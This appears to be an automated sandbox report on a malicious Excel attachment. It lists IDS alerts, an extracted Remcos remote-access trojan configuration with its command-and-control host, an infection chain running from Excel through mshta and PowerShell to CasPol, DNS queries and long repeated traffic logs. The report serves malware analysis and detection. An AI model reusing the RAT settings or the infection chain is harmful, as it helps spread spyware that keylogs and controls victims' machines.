                  2024-11-25T14:07:05.115920+0100 | 2049038 | 1 | A Network Trojan was detected | 193.30.119.205 | 443 | 192.168.2.22 | 49168 | TCP
                  2024-11-25T14:07:20.951958+0100 | 2049038 | 1 | A Network Trojan was detected | 193.30.119.205 | 443 | 192.168.2.22 | 49172 | TCP
                  2024-11-25T14:07:28.439430+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | TCP
                  2024-11-25T14:06:33.524346+0100 | 2858295 | 1 | A Network Trojan was detected | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-11-25T14:06:33.524346+0100 | 2858295 | 1 | A Network Trojan was detected | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
                  2024-11-25T14:06:49.776281+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.22 | 49165 | 172.234.205.135 | 80 | TCP


                  AV Detection

                  Source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": ["newbeggin.duckdns.org:2412:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H42H13", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: OC25-11-24.xls, ReversingLabs: Detection: 15%
                  Source: Yara match, File source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR
                  Source: OC25-11-24.xls, Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 30_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,30_2_00404423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,35_2_0043293A
                  Source: CasPol.exe, Binary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  Source: Yara match, File source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00406764 _wcslen,CoGetObject,35_2_00406764

                  Phishing

                  Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta, type: DROPPED
                  Source: unknown, HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown, HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49170 version: TLS 1.2
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdbhP source: powershell.exe, 00000012.00000002.486539543.000000000284C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdb source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdb source: powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdbhP source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 30_2_0040AE51 FindFirstFileW,FindNextFileW,30_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 31_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 33_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,33_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,35_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,35_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_0044D5E9 FindFirstFileExA,35_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,35_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00406AC2 FindFirstFileW,FindNextFileW,35_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,35_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,35_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,35_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 35_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,35_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\mshta.exe
                  Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: global traffic, DNS query: name: provit.uk
                  Source: global traffic DNS query: name: 3105.filemail.com
                  Source: global traffic DNS query: name: newbeggin.duckdns.org
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
